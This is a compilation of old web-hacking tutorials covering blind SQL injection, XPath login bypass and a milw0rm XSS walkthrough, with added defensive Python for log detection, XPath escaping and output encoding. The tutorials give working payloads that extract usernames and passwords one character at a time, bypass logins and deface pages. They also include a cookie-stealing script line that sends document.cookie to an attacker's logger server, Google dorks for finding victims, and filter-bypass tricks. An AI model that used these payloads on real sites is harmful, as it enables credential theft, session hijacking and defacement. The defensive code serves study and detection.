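    return conn.execute(sql, (news_id,)).fetchall()


def vulnerable_query_errors(conn, id_param):
    """True when the concatenated statement fails to parse, which is exactly what
    the tutorial's first probe (a trailing single quote) provokes and observes."""
    try:
        fetch_news_vulnerable(conn, id_param)
    except sqlite3.OperationalError:
        return True
    return False
```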

2. Blind SQL Injection

Blind injection is a little more complicated than classic injection, but it can be done.
I must mention that there is a very good blind SQL injection tutorial by xprog, so it's not bad to read it.
Let's start with the advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

When we execute this, we see some page and articles on that page, pictures etc...

Then, when we want to test it for a blind SQL injection attack:

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's OK.

Now the real test:

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

So if some text, picture or other content is missing on the returned page, then that site is vulnerable to blind SQL injection.

1) Get the MySQL version

To get the version in a blind attack we use substring,

i.e.

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

This should return TRUE if the MySQL version is 4.

Replace 4 with 5, and if the query returns TRUE then the version is 5,

i.e.

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

When SELECT doesn't work we use a subselect,

i.e.

http://www.site.com/news.php?id=5 and (select 1)=1

If the page loads normally then subselects work.

Then we are going to see if we have access to mysql.user,

i.e.

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

If the page loads normally we have access to mysql.user, and then later we can pull some passwords using the load_file() function and OUTFILE.

3). Check table and column names

This is the part where guessing is your best friend,
i.e.

http://www.site.com/news.php?id=5 and 
(select 1 from users limit 0,1)=1 
(with limit 0,1 our query here returns 1 row of data, because the subselect
may return only 1 row; this is very important.)

Then, if the page loads normally without content missing, the table users exists.
If you get FALSE (some article missing), just change the table name until you guess the right one.
Let's say that we have found that the table name is users; now what we need is a column name.

The same as with the table name, we start guessing. Like I said before, try the common names for columns,

i.e.

http://www.site.com/news.php?id=5 and 
(select substring(concat(1,password),1,1) from users limit 0,1)=1

If the page loads normally we know that the column name is password (if we get FALSE then try common names or just guess).

Here we merge 1 with the column password, then substring returns the first character (,1,1).

4). Pull data from database

We found table users and columns username and password, so we are going to pull characters from them.

http://www.site.com/news.php?id=5 and 
ascii(substring((SELECT concat(username,0x3a,password) 
from users limit 0,1),1,1))>80

OK, this here pulls the first character from the first user in table users.

substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ASCII value,

and then we compare it with the greater-than symbol > .

So if the ASCII value is greater than 80, the page loads normally (TRUE).

We keep trying until we get FALSE.

http://www.site.com/news.php?id=5 and 
ascii(substring((SELECT concat(username,0x3a,password) 
from users limit 0,1),1,1))>95

We get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and 
ascii(substring((SELECT concat(username,0x3a,password) from 
users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and 
ascii(substring((SELECT concat(username,0x3a,password) from 
users limit 0,1),1,1))>99
FALSE!!!

So the first character of the username is char(99). Using an ASCII table we know that char(99) is the letter 'c'.

Then let's check the second character.

http://www.site.com/news.php?id=5 and 
ascii(substring((SELECT concat(username,0x3a,password) from users 
limit 0,1),2,1))>99

Note that I changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).

http://www.site.com/news.php?id=5 and
ascii(substring((SELECT concat(username,0x3a,password) from
users limit 0,1),2,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and
ascii(substring((SELECT concat(username,0x3a,password) from
users limit 0,1),2,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring
((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring
((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

FALSE!!!

We know that the second character is char(105), and that is 'i'. We have 'ci' so far.

So keep incrementing until you get to the end (when >0 returns FALSE we know that we have reached the end).

There are some tools for Blind SQL Injection; I think sqlmap is the best, but I'm doing everything manually, because that makes you a better SQL injector.

Hope you learned something from this paper.

Have FUN! (:
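From the defender's side, every probe in the two parts above reaches the web server as a GET request, so the whole sequence is visible in the access log. As an added example (not from the tutorial), the Python below decodes constructed Apache-style log lines, tags the probe types described above, and flags clients that issue several of them; the addresses, timestamps and log lines are constructed sample data.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache common log format; addresses are documentation ranges).
SAMPLE_LOG = """\
203.0.113.9 - - [30/Jul/2013:10:01:02 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120
203.0.113.9 - - [30/Jul/2013:10:01:09 +0000] "GET /news.php?id=5%20and%201=1 HTTP/1.1" 200 5120
203.0.113.9 - - [30/Jul/2013:10:01:15 +0000] "GET /news.php?id=5%20and%201=2 HTTP/1.1" 200 4870
203.0.113.9 - - [30/Jul/2013:10:01:21 +0000] "GET /news.php?id=5%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.9 - - [30/Jul/2013:10:01:30 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E80 HTTP/1.1" 200 5120
203.0.113.9 - - [30/Jul/2013:10:01:34 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E95 HTTP/1.1" 200 5120
203.0.113.9 - - [30/Jul/2013:10:01:38 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E99 HTTP/1.1" 200 4870
198.51.100.7 - - [30/Jul/2013:10:02:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 6011
198.51.100.7 - - [30/Jul/2013:10:02:05 +0000] "GET /search.php?q=order%20by%20date HTTP/1.1" 200 2200
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# One pattern per step of the walkthrough above, applied to the URL-decoded
# request target because the probes arrive percent-encoded.
PROBES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),         # column counting
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),  # classic extraction
    "boolean_pair": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),       # 1=1 / 1=2 blind test
    "version_probe": re.compile(r"substring\(\s*@@version", re.I),     # blind version check
    "blind_extract": re.compile(r"ascii\(\s*substring\(", re.I),       # character-by-character pull
}


def classify_request(target):
    """Return the sorted probe names whose pattern matches the decoded target."""
    decoded = unquote_plus(target)
    return sorted(name for name, rx in PROBES.items() if rx.search(decoded))


def parse_log(log_text):
    """Yield (client, target, status, size) for every line that parses."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            size = 0 if m["size"] == "-" else int(m["size"])
            yield m["client"], m["target"], int(m["status"]), size


def suspicious_clients(log_text, threshold=3):
    """Clients with at least `threshold` tagged requests, with per-probe counts and
    the distinct response sizes of their blind probes.

    The blind technique relies on the page looking different for TRUE and FALSE;
    that difference also shows up as two alternating response sizes in the log,
    which corroborates the pattern match.
    """
    counts, sizes = {}, {}
    for client, target, _status, size in parse_log(log_text):
        tags = classify_request(target)
        if not tags:
            continue
        counts.setdefault(client, Counter()).update(tags)
        if "blind_extract" in tags or "boolean_pair" in tags:
            sizes.setdefault(client, set()).add(size)
    return {
        client: {"probes": dict(cnt), "oracle_sizes": sorted(sizes.get(client, ()))}
        for client, cnt in counts.items()
        if sum(cnt.values()) >= threshold
    }
```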

XPath Injection Attacks Methodology and Examples.

PREREQUISITE -
- Basic programming skills and data manipulation in XML (Extensible Markup Language) and XPath.
- Basic knowledge of web applications' input vulnerabilities and sanitisation methods
- Beginner-level understanding of client/server communication protocols and authentication procedures

SUGGESTED KNOWLEDGE -
- Intermediate understanding of ASP.NET, Java and/or C# code and web programming

PURPOSE -
- Attack used to extract data from XML databases/documents
- Manipulate data from a local/remote location against the server (victim)


DEFINITIONS -

[1]"XPath injection is an attack targeting Web sites that create XPath queries from user-supplied data. If an application embeds unprotected data into an XPath query, the query can be altered so that it is no longer parsed in the manner originally intended. This can be done by bypassing the Web site authentication system and extracting the structure of one or more XML documents in the site."

[2]"XPath 1.0 is a language used to refer to parts of an XML document. It can be used directly by an application to query an XML document, or as part of a larger operation such as applying an XSLT transformation to an XML document, or applying an XQuery to an XML document."


Similar to SQL injection, XPath injection manipulates data in XML databases. Therefore, an analogy can be drawn between the two injection methods. They share many things in common, such as the use of regex expressions and, most importantly, their payload; in this case, to obtain data from a server locally or, in most cases, remotely from the client.

Assuming you know XML and XPath, we're going to dive directly into the attack methodology by using examples of exploitable vulnerabilities.

1ST EXAMPLE: Similarities to SQL...

In SQL, we use regex expressions to "trick" the server by passing (somewhat) malicious input to it, like:

if the login system was set up as follows:
Select * from users where LoginID=' ' and passwd=' '

we can exploit it as such:
abc' or 1=1 --

and we'll have a payload, or desired input query, passed to the server to execute our input, thus making it:
Select * from users where LoginID = 'abc' or 1=1 -- 'and passwd=' '

We commented out the password requirement and passed only our LoginID, which turns out to be TRUE.

The same concept applies to XML databases/documents with XPath injections...
That same code, when translated to XPath, becomes:

For the insecure/exploitable login system, which accepts input as follows:
String(//users[LoginID/text()=' " + txtLoginID.Text + " ' and passwd/text()=' "+ txtPasswd.Text +" '])

Now, we type into the LoginID:
abc' or 1=1 or 'a'='b

Thus also suppressing the need to type in a password, and turning our LoginID into a valid one from the database/document in XML. Like:
String(//users[LoginID/text()='abc' or 1=1 or 'a'='b' and passwd/text()=''])

We get a payload/desired input query passed as:
LoginID='abc' or 1=1 or 'a'='b' and passwd/text()=' '

(which can also be represented, logically, as A OR B OR C AND D)


2ND EXAMPLE: More complex Procedure...

Insecure/exploitable code (C#):
XmlDocument XmlDoc = new XmlDocument();
XmlDoc.Load("...");
XPathNavigator nav = XmlDoc.CreateNavigator();
XPathExpression expr = nav.Compile("string(//user[name/text()='" + TextBox1.Text + "' and password/text()='" + TextBox2.Text + "']/account/text())");
String account = Convert.ToString(nav.Evaluate(expr));
if (account == "") {
    // name+password pair is not found in the XML document -
    // login failed.
} else {
    // account found -> Login succeeded.
    // Proceed into the application.
}

For the username query, we place this injection:
' or 1=1 or ''='

As a payload, we get this code parsed and executed by the server:
string(//user[name/text()='' or 1=1 or ''='' and password/text()='foobar']/account/text())

Tada! Now we get an output result of:
string(//user/account/text())

In other words, we have an instance of
//user/account/text()

What this does is log us in as the first user in the XML document.
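Both examples above work because the user's text lands inside the quotes of an XPath string literal, and a quote in the input closes that literal early. As an added example (not from the article), the Python below builds the first example's login query both ways: by plain concatenation, as the article's code does, and with a helper that emits each value as a complete XPath 1.0 literal, using concat() to split values that contain both quote characters, since XPath 1.0 has no escape character. The function names are assumptions.

```python
def xpath_literal(value):
    """Render a Python string as an XPath 1.0 string literal.

    XPath 1.0 has no escape character inside literals. A value without single
    quotes can be wrapped in single quotes, one without double quotes in double
    quotes, and one containing both must be split on the single quotes and
    reassembled with concat(), inserting "'" between the pieces.
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    pieces = ["'" + part + "'" for part in value.split("'")]
    return "concat(" + ", \"'\", ".join(pieces) + ")"


def login_query_vulnerable(login_id, passwd):
    """The article's construction: user text is spliced between quote characters,
    so a quote in the input ends the literal and the rest becomes XPath syntax."""
    return ("string(//users[LoginID/text()='" + login_id +
            "' and passwd/text()='" + passwd + "'])")


def login_query_safe(login_id, passwd):
    """Same query with each value emitted as a complete literal; quote characters
    in the input can no longer terminate the literal or add predicates."""
    return ("string(//users[LoginID/text()=" + xpath_literal(login_id) +
            " and passwd/text()=" + xpath_literal(passwd) + "])")


# The article's first payload, copied here as a constructed test input.
PAYLOAD = "abc' or 1=1 or 'a'='b"
```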


CONCLUSION -
Hope you got something from this article. I will try to write an article on XML/XPath programming in the future (if time allows).
But for now, learn at your own pace, and explore the depths of this notorious, yet esoteric attack. I also urge you to try combination or blind injections, when you have time on your hands. For beginners, I hope this sparks your interest and hunger for more knowledge; I'd suggest learning and doing HBH's web patching challenges, which, by the way, are my favourite here.

Truly doing something fishy,
- NETFISH.

WORKS CITED:
http://en.hakin9.org/attachments/xpath_new_en.pdf
http://palisade.plynt.com/issues/2005Jul/xpath-injection/
http://www.webappsec.org/projects/threat/classes/xpath_injection.shtml
http://www.spidynamics.com/spilabs/education/articles/code-injection.html
http://searchappsecurity.techtarget.com/sDefinition/0,,sid92_gci1193384,00.html

XSS The Complete Walkthrough

--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 1 - What is XSS?] +==--
--==+========================================================================+==--

'XSS', also known as 'CSS' (Cross Site Scripting, easily confused with 'Cascading Style Sheets'),
is a very common vulnerability found in web applications. XSS allows the attacker to INSERT
malicious code. There are many types of XSS attacks; I will mention 3 of the most used.

The first attack I want to talk about is 'URL XSS'. This means that the XSS won't stay on the page;
it will only get executed if you have the malicious code in the URL and submit the URL.
We will talk more about how to use this to our advantage.

The second attack is input fields. Wherever you can insert data, it is very common to be XSS
vulnerable. For example, say we found a site with a search engine. Now in the search box you enter
'hacker' and hit enter; when the page loads, if it shows your data, like 'Found 100 Results For hacker',
you see it is displaying our data on the page. Now what if we can execute code? There is no possible
way to execute PHP code in this attack, but there certainly is for HTML and Javascript. But be aware this method
also won't stay on the server; this is for your eyes only.

The third attack: with this attack you will be able to INSERT data (code) and it will stay on the website.
Now there are 2 kinds; it depends on whether we can execute PHP or HTML. If we can inject PHP then we can also
inject HTML, but NOT vice versa. OK, this kind of attack is normally found on blogs, shoutboxes, profiles,
forums, just most places where you insert data and it stays there. Now HTML is totally different from PHP:
HTML downloads to your PC and then your 'browser' parses/interprets the code (that's why its source is viewable).
With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.
PHP injection is rare, but it doesn't harm to try. Note: PHP code can't be injected into an HTML page!


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 2 - Finding XSS Vulnerabilities] +==--
--==+========================================================================+==--

Well, to start finding these vulnerabilities you can start checking out
blogs, forums, shoutboxes, comment boxes, search boxes; there are too many to mention.

Use 'Google dorks' to make the finding easier. OK, if you want to get cracking, go to google.com and type
inurl:"search.php?q=" ; that is a common page and has a lot of results. To find out some attacks, move
on to the next chapter.

Also note that most sites have XSS vulnerabilities; it's just about having a good eye, and some good knowledge
of how to bypass their filtering.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 3 - The Basics On XSS] +==--
--==+========================================================================+==--

Well, now to crack on and start learning some actual methods. The most commonly used XSS injection is

<script>alert("XSS")</script>

Now this will alert a popup message saying "XSS" without quotes; it's easily editable.

So, backtracking to the last chapter, I'm assuming you remember we talked about search.php?q=.
Well, you can simply try the following on a website with the same thing:

http://site.com/search.php?q=<script>alert("XSS")</script>

There are good chances of it working, but don't be worried if it doesn't; just try different sites.

Some other easy XSS (I don't think people realise they can insert HTML, not just Javascript):

http://site.com/search.php?q=<br><br><b><u>XSS</u></b>

If you see the bold text on the page and newlines, then you know it's vulnerable, and you can move on to using some
methods explained later on in the tutorial.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 4 - Deface Methods] +==--
--==+========================================================================+==--

Well, now you understand how XSS works, we can explain some simple XSS deface methods. There
are many ways of defacing; I will mention some of the best and most used.

The first one is IMG SRC. Now for those of you who don't know HTML, IMG SRC is a tag that
displays the image linked to it on the webpage.

<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

OK, now if you change the link to a valid picture link, save it and run it, you will see what I mean.

Right now, say you have found a shoutbox, comment box, or anything that shows your data after you submitted it;
you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed, as the page will already have them (in rare cases it will not).

OK, it helps to make your picture big so it stands out and it's clear the site got hacked.

Another method is using FLASH videos; it's the same as the method above, but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf">

That will execute the flash video linked to it.

Or maybe use a popup or redirection?

<script>window.open( "http://www.google.com/" )</script>

There are many other ways that I'm not going to explain due to how busy I am. It's easy to look up methods
using Google and googling for HTML tutorials; you can see how to embed music etc.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 5 - Cookie Stealing] +==--
--==+========================================================================+==--

I decided to add this as it's the most USEFUL method of XSS, and I haven't seen any papers covering it.

First grab the cookie logger from here: http://G0t-Root.net/tools/cookie.php

OK, now you have it, save it as a .php file and upload it to your server. Remember to create the file 'log.txt' too
and chmod it to 777. OK, now find an XSS vulnerable website; any attack type will do.

OK, now you're going to want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


Now when a user visits the page that got injected, they will be sent to the site, and the cookie will be stolen.
The second one is more stealthy.

Watch your file now for cookies; then you can hijack their session :D

But now you ask, what if my site hasn't got this kind of attack? It only shows data once and doesn't
store it. Well, let's say we had a page search.php?q=. We can use the following code to make a malicious URL from it,
and maybe hex or base64 encode it so people can't see the code:

http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

I'm not going to explain hexing it etc., as it is pretty straightforward.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 6 - Filter Bypassing] +==--
--==+========================================================================+==--

A lot of sites may seem vulnerable but don't execute the code; well, to solve this take note of this chapter.

Some common methods to bypass filtering are

')alert('xss');

or

");alert('xss');

That will do the same thing as <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit it.

Please note it's bad practice to use alert("XSS") to test for XSS, as I've known sites to block the keyword XSS
before.

Some other ways to bypass filtering:

<script type=text/javascript>alert("t0pP8uZz")</script>
<script>alert("t0pP8uZz")</script>;
<script>alert("t0pP8uZz");</script>
<script>alert(/t0pP8uZz/)</script>
<script>var myVar = 1; alert(myVar)</script>

Read the next chapter for another way to bypass magic quotes filtering.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 6 - Advanced XSS] +==--
--==+========================================================================+==--

OK, in this chapter we're going to learn about some good techniques that I myself haven't seen
being used before, but I'm sure you guys will like them.

I've come across many sites where 'Magic Quotes' is on, therefore rendering some commands useless.

Fear not, I've come up with a way using char codes (decimals), converting char codes to ASCII.

For the functions that turn char codes (decimals) into ASCII, you can find a complete table here: http://www.asciitable.com/

This will help you write what you want. In my examples I'll be writing "t0pP8uZz"; this is the following code:

116 48 112 80 56 117 90 122

OK, now we've got the decimal value of our string, we need to know what function in Javascript converts this.

String.fromCharCode()

is suitable for this kind of thing. It's easy to set up; I'm going to give it my args below.

String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)

OK, now "String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122)" is a Javascript (ASCII) way of saying

t0pP8uZz

and to use this with alerts etc. you don't need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122))</script>

OK, now this will display our message, in this case "t0pP8uZz". This method is very useful for
bypassing magic quotes and maybe some custom escaping of quotes.

OK, before I move on I want to talk about another method using variables. Let's declare one below:

var myVar = 1

OK, now myVar is a longer way of saying 1.

To use variables to our advantage in XSS, we could do the following:

<script>var myVar = 1; alert(myVar)</script>

and this will display the variable contents, again without using quotes.

There are many other methods that I'm not going to talk about; XSS is a simple attack,
and from here you should know what you need.


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [Chapter 7 - Securing XSS] +==--
--==+========================================================================+==--

OK, this was written for web developers (yeah right..), so I'm going to talk about how to secure your code.

If you find XSS bugs in your scripts, it's easy to secure them. Take a look at the code below:

if(isset($_POST['form'])){echo "<html><body>" .$_POST['form']. "</body></html>";}

OK, say the variable $_POST['form'] was coming from an input box; then you have an XSS attack.
The following is a very easy way to secure that:

$charset='UTF-8'; $data = htmlentities($_POST['form'], ENT_NOQUOTES, $charset);
if(isset($data)){echo "<html><body>" .$data. "</body></html>";}

Now that will take all possible code and make it not executable, by turning it into stuff like
&lt; etc...

You will not notice a difference when using htmlentities().

There is also another common function, strip_tags(); find more info at php.net/strip_tags

OK, another way: how to secure INTEGER variables (variables that will always contain an INT).

$id = $_GET['id'];
echo "you are viewing " . $id . " blog";

Now if we include ?id=<script>alert("XSS")</script>
in the URL it's going to execute our code. A very easy way to secure this is using (int); check the following code:

$id = (int)$_GET['id'];
echo "you are viewing " . $id . " blog";

Now if at any time the variable contains anything but an integer, it will return 0.

That's enough said.
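Chapter 6 mentions sites that block the keyword XSS and shows the fromCharCode variant that gets around such a filter; chapter 7 fixes the output with htmlentities() and (int). As an added example (not the walkthrough's code), the Python below puts the walkthrough's own payloads through a keyword blacklist of that kind and through an output-encoding equivalent of htmlentities(ENT_NOQUOTES), plus a cast that behaves like PHP's (int). The blacklist and the function names are assumptions.

```python
import html
import re

# Payloads copied from the walkthrough above (constructed test inputs; nothing is sent anywhere).
PAYLOADS = [
    '<script>alert("XSS")</script>',
    '<br><br><b><u>XSS</u></b>',
    '<IMG SRC="http://site.com/yourDefaceIMAGE.png">',
    '<script>alert(String.fromCharCode(116, 48, 112, 80, 56, 117, 90, 122))</script>',
    '<script type=text/javascript>alert("t0pP8uZz")</script>',
]

# Tags the walkthrough uses; a page still containing one of them un-encoded is live markup.
MARKUP_RE = re.compile(r"<\s*(script|img|embed|b|u|br)\b", re.I)


def keyword_blacklist(value):
    """A filter of the kind chapter 6 describes: drop input containing the word 'XSS'.
    It keys on the tester's marker text, not on the markup, so any other text passes."""
    return "" if re.search(r"xss", value, re.I) else value


def render_unsafe(value):
    """Equivalent of: echo "<html><body>" . $_POST['form'] . "</body></html>";"""
    return "<html><body>" + value + "</body></html>"


def render_escaped(value):
    """Equivalent of htmlentities($_POST['form'], ENT_NOQUOTES, 'UTF-8'):
    < > & become entities, so the browser shows the text instead of parsing it."""
    return "<html><body>" + html.escape(value, quote=False) + "</body></html>"


def php_int_cast(raw):
    """Behave like PHP's (int) on a string: the leading integer, otherwise 0."""
    m = re.match(r"\s*([-+]?\d+)", raw)
    return int(m.group(1)) if m else 0


def markup_survives(page):
    """True if the rendered page still contains an un-encoded tag."""
    return MARKUP_RE.search(page) is not None


def bypassing_payloads(payloads=PAYLOADS):
    """Payloads that pass the keyword blacklist and still reach the page as live markup."""
    return [p for p in payloads if markup_survives(render_unsafe(keyword_blacklist(p)))]


def all_neutralized(payloads=PAYLOADS):
    """True if output encoding leaves no live markup for any payload."""
    return not any(markup_survives(render_escaped(p)) for p in payloads)
```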


--==+========================================================================+==--
--==+ XSS The Complete Walkthrough [The End] +==--
--==+========================================================================+==--

ps. this is not my article, just to help you out with some basic XSS.

Article from milw0rm.com
Main author: t0pP8uZz
Security article